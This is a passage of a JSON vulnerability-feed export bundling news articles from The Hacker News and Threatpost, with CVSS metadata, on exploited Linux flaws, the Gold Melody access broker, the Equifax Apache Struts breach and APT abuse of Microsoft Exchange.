vulnerability\n\n[![](https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg)](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[![](https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg)](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T11:13:06", "description": "[![Ransomware Attackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEir4L0zsDJ9D5U4kME3FrbnUk5EFegKpTfUDGGS-jG-6WSfCd3IMiQWXApu0SvJg77AGeoxqfEAXOxrUNRyspVtEN5TxK3USDIqoYAff5WtDlquTcdsN1SeJXEljaMZkqSFZDSyb0uppqN2gRYb8FI7PAVV5-dWNfycSd656GJZcTXBvOhZlgMqkZ0vBE_1/s728-e365/malware-attack.jpg>)\n\nA financially motivated threat actor has been outed as an **initial access broker** (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware.\n\nSecureWorks Counter Threat Unit (CTU) has dubbed the e-crime group [Gold Melody](<https://www.secureworks.com/research/threat-profiles/gold-melody>), which is also known by the names Prophet Spider (CrowdStrike) and UNC961 (Mandiant).\n\n\"This financially motivated group has been active since at least 2017, compromising organizations by exploiting vulnerabilities in unpatched internet-facing servers,\" the cybersecurity company [said](<https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker>).\n\n\"The victimology suggests opportunistic attacks for financial gain rather than a targeted campaign conducted by a state-sponsored threat group for espionage, destruction, or disruption.\"\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/o6a5Vxgy> \"Cybersecurity\" )\n\nGold Melody has been [previously](<https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/>) [linked](<https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/>) to [attacks](<https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation>) exploiting security flaws in JBoss Messaging (CVE-2017-7504), Citrix ADC (CVE-2019-19781), Oracle WebLogic (CVE-2020-14750 and CVE-2020-14882), GitLab (CVE-2021-22205), Citrix ShareFile Storage Zones Controller (CVE-2021-22941), Atlassian Confluence (CVE-2021-26084), ForgeRock AM (CVE-2021-35464), and Apache Log4j (CVE-2021-44228) servers.\n\nThe cybercrime group has been observed expanding its victimology footprint to strike retail, health care, energy, financial transactions, and high-tech organizations in North America, Northern Europe, and Western Asia as of mid-2020.\n\nMandiant, in an analysis published in March 2023, said that \"in multiple instances, UNC961 intrusion activity has preceded the deployment of Maze and Egregor ransomware from distinct follow-on actors.\"\n\nIt further [described](<https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated>) the group as \"resourceful in their opportunistic angle to initial access operations\" and noted it \"employs a cost-effective approach to achieve initial access by exploiting recently disclosed vulnerabilities using publicly available exploit code.\"\n\nBesides relying on a diverse arsenal comprising web shells, built-in operating system software, and publicly available utilities, it's known to employ proprietary remote access trojans (RATs) and tunneling tools such as GOTROJ (aka MUTEPUT), BARNWORK, HOLEDOOR, DARKDOOR, AUDITUNNEL, HOLEPUNCH, LIGHTBUNNY, and HOLERUN to execute arbitrary commands, gather system information, and establish a reverse tunnel with a hard-coded IP address.\n\nSecureworks, which linked Gold Melody to five intrusions between July 2020 and July 2022, said these attacks entailed the abuse of a different set of flaws, including those impacting Oracle E-Business Suite ([CVE-2016-0545](<https://nvd.nist.gov/vuln/detail/CVE-2016-0545>)), Apache Struts ([CVE-2017-5638](<https://www.synopsys.com/blogs/software-security/cve-2017-5638-apache-struts-vulnerability-explained.html>)), Sitecore XP ([CVE-2021-42237](<https://blog.assetnote.io/2021/11/02/sitecore-rce/>)), and Flexera FlexNet ([CVE-2021-4104](<https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html>)) to obtain initial access.\n\nUPCOMING WEBINAR\n\n[Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM\n\n](<https://thehacker.news/itdr-saas?source=inside>)\n\nStay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.\n\n[Supercharge Your Skills](<https://thehacker.news/itdr-saas?source=inside>)\n\nA successful foothold is succeeded by the deployment of web shells for persistence, followed by creating directories in the compromised host to stage the tools used in the infection chain.\n\n\"Gold Melody conducts a considerable amount of scanning to understand a victim's environment,\" the company said. \"Scanning begins shortly after gaining access but is repeated and continued throughout the intrusion.\"\n\nThe reconnaissance phase paves the way for credential harvesting, lateral movement, and data exfiltration. That said, all five attacks ultimately proved to be unsuccessful.\n\n\"Gold Melody acts as a financially motivated IAB, selling access to other threat actors,\" the company concluded. \"The buyers subsequently monetize the access, likely through extortion via ransomware deployment.\"\n\n\"Its reliance on exploiting vulnerabilities in unpatched internet-facing servers for access reinforces the importance of robust patch management.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-21T09:11:00", "type": "thn", "title": "Cyber Group 'Gold Melody' Selling Compromised Access to Ransomware Attackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0545", "CVE-2017-5638", "CVE-2017-7504", "CVE-2019-19781", "CVE-2020-14750", "CVE-2020-14882", "CVE-2021-22205", "CVE-2021-22941", "CVE-2021-26084", "CVE-2021-35464", "CVE-2021-4104", "CVE-2021-42237", "CVE-2021-44228"], "modified": "2023-09-21T09:11:14", "id": "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "href": "https://thehackernews.com/2023/09/cyber-group-gold-melody-selling.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-19T15:15:21", "description": "New, sophisticated adversaries are switching up their tactics in exploiting enterprise-friendly platforms \u2014 most notably Microsoft Exchange, Outlook Web Access (OWA) and Outlook on the Web \u2013 in order to steal business credentials and other sensitive data.\n\nBoth Microsoft\u2019s Exchange mail server and calendaring server and its Outlook personal information manager web app provide authentication services \u2013 and integration with other platforms \u2013 that researchers say are prime for attackers to leverage for launching attacks.\n\nAccenture\u2019s 2020 Cyber Threatscape report, released Monday, shed light on how actors are leveraging Exchange and OWA \u2013 and evolving their tactics to develop new malware families that target these services, or using new detection evasion techniques.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWeb-facing, data-intense systems and services that typically communicate externally can make it easier for adversaries to hide their traffic in the background noise, while authentication services could open up a credential-harvesting opportunity for cybercriminals,\u201d according to [Accenture researchers on Monday](<https://newsroom.accenture.com/news/state-sponsored-hackers-and-ransomware-gangs-are-diversifying-tactics-to-inflict-more-harm-according-to-accenture-report.htm>).\n\n## **APTs Flock Exchange, OWA**\n\nOne threat group that has been targeting Exchange and OWA is what researchers dub \u201cBELUGASTURGEON\u201d (aka[ Turla or Whitebear](<https://threatpost.com/turla-apt-revamps-comrat/156051/>)). Researchers say that this [group operates from Russia](<https://threatpost.com/turla-compromises-iranian-apt/149375/>), has been active for more than 10 years and is associated with numerous cyberattacks aimed at government agencies, foreign-policy research firms and think tanks across the globe.\n\nThe group is targeting these Microsoft services and using them as beachheads to hide traffic, relay commands, compromise e-mail, exfiltrate data and gather credentials for future espionage attacks, said researchers. For instance, they are manipulating legitimate traffic that\u2019s traversing Exchange in order to relay commands or exfiltrate sensitive data.\n\n\u201cHosts supporting Exchange and associated services frequently relay large volumes of data to external locations\u2014 representing a prime opportunity for malicious actors to hide their traffic within this background noise,\u201d said researchers.\n\nAnother group, which researchers call SOURFACE (aka [APT39 or Chafer](<https://threatpost.com/chafer-apt-hits-middle-east-govs-with-latest-cyber-espionage-attacks/156002/>)), appears to have developed similar techniques to conceal malicious traffic, manipulating local firewalls and proxying traffic over non-standard ports using native commands, tools and functions, researchers said. Researchers said this group has been active since at least 2014 and is known for its cyberattacks on the oil and gas, communications, transportation and other industries in the Australia, Europe, Israel, Saudi Arabia, the U.S. and other regions.\n\nIn addition, threat groups are also creating new malware designed to specifically target Exchange and OWA. Researchers said they discovered several malicious files in the wild in 2019 that they assessed \u201cwith moderate confidence\u201d were associated to a group called BLACKSTURGEON, used in targeting government and public sector orgs.\n\nThat includes a file that seemed like a version of the group\u2019s [customized version of the \u201cRULER\u201d tool,](<https://www.hacking.land/2016/10/ruler-tool-to-abuse-exchange-services.html?m=1>) which is designed to abuse Microsoft Exchange services. This file exploits the [CVE- 2017-11774 Outlook 